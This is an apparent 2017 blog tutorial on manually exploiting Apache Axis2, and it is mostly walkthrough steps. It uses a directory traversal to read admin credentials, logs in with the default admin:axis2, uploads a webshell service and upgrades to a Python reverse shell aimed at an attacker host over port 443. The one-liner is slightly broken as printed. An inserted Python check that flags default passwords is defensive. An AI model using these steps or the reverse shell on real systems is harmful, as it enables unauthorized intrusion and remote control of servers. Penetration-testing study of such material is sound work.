Thursday, March 9, 2017

Manually Exploiting Apache Axis2


I do not condone or take responsibility for any illegal use of this tutorial. Please only target hosts you have permission to test.


For this exploit to work you must have:
  1. Valid admin console credentials
    • Default = admin:axis2
  2. Public access to the admin console


There are a couple of ways to find credentials for an Axis2 server: default credentials, weak credentials that can be brute forced, or an outdated Axis2 version. Here we will use a vulnerability in Apache Axis2 <= v1.4.1 to discover the necessary credentials. This vulnerability is a directory traversal that gives read access to the configuration file, which is where the admin console credentials are stored. It can be discovered using modules in Nmap and OpenVAS.


$ nmap -p<port> --script http-axis2-dir-traversal <ip>
|_http-axis2-dir-traversal.nse: Admin credentials found -> admin:axis2



  • There is a Metasploit module at "exploit/multi/http/axis2_deployer" that will attempt to "Autopwn" the server.
  • The code can be found on GitHub.
  • I have tried this exploit multiple times with no success.

Manual Validation

  1. Navigating to will allow us to get the credentials. They should look like this:

     <parameter name="userName">admin</parameter>
     <parameter name="password">axis2</parameter>

  2. When you navigate to it should give you the login portal.
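
Because the traversal exposes the configuration file, the password in it is only a secret if it has been changed from the default. The following check is an added example, not code from the original post: it parses an axis2.xml document for the userName and password parameters shown above and flags the shipped default (admin:axis2) or a short password. The sample XML excerpts and the 12-character minimum are constructed assumptions, not Axis2 settings.

```python
import xml.etree.ElementTree as ET

# Default admin console credentials shipped with Axis2 (admin:axis2).
DEFAULT_CREDENTIALS = {("admin", "axis2")}
MIN_PASSWORD_LENGTH = 12  # assumed local policy, not an Axis2 setting


def admin_credentials(xml_text):
    """Return the (userName, password) pair stored in an axis2.xml document.

    The admin console login lives in two <parameter> elements named
    userName and password; a missing element yields None for that value.
    """
    root = ET.fromstring(xml_text)
    values = {}
    for param in root.iter("parameter"):
        if param.get("name") in ("userName", "password"):
            values[param.get("name")] = (param.text or "").strip()
    return values.get("userName"), values.get("password")


def audit_axis2_config(xml_text):
    """Return a list of findings; an empty list means no issue was found."""
    user, password = admin_credentials(xml_text)
    findings = []
    if user is None or password is None:
        findings.append("admin userName/password parameter missing from axis2.xml")
        return findings
    if (user, password) in DEFAULT_CREDENTIALS:
        findings.append(f"default admin credentials in use ({user}:{password})")
    if len(password) < MIN_PASSWORD_LENGTH:
        findings.append(f"admin password shorter than {MIN_PASSWORD_LENGTH} characters")
    return findings


# Constructed sample excerpts (not a real deployment's file): one with the
# shipped defaults, one with a changed password.
SAMPLE_DEFAULT = """<axisconfig name="AxisJava2.0">
    <parameter name="hotdeployment">true</parameter>
    <parameter name="userName">admin</parameter>
    <parameter name="password">axis2</parameter>
</axisconfig>"""

SAMPLE_CHANGED = SAMPLE_DEFAULT.replace(
    '<parameter name="password">axis2</parameter>',
    '<parameter name="password">constructed-long-example-pw</parameter>')

if __name__ == "__main__":
    for label, doc in (("default", SAMPLE_DEFAULT), ("changed", SAMPLE_CHANGED)):
        print(label, audit_axis2_config(doc) or ["no findings"])
```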

Create the Payload

A simple Axis2 webshell can be found at
  1. Download the file
  2. Compile the file
    • Modify $JAVA_HOME if necessary
    • "ant -v" to build


  1. Upload the AxisInvoker.aar service.
  2. Verify the deployment by checking the Deactivate or Activate service tab.
  3. Verify the shell works by running
  4. Since stable shells are superior to web shells, we will upgrade to a stable shell. You will need to find out which languages are available on the system, or use a native option (like nc).
    • Get a reverse shell and point it at your host machine.
      • I usually get most of my shells from PentestMonkey
      • import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("<AttackerIP>",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);["/bin/sh","-i"]);
    • Download your reverse shell from your webserver to the victim machine.
    • Listen for the reverse shell by running "nc -nlvp 443".
    • Execute your shell on the victim machine.
    • After a few seconds, you should have a shell on your listener!

Hope that helps in your future pentests!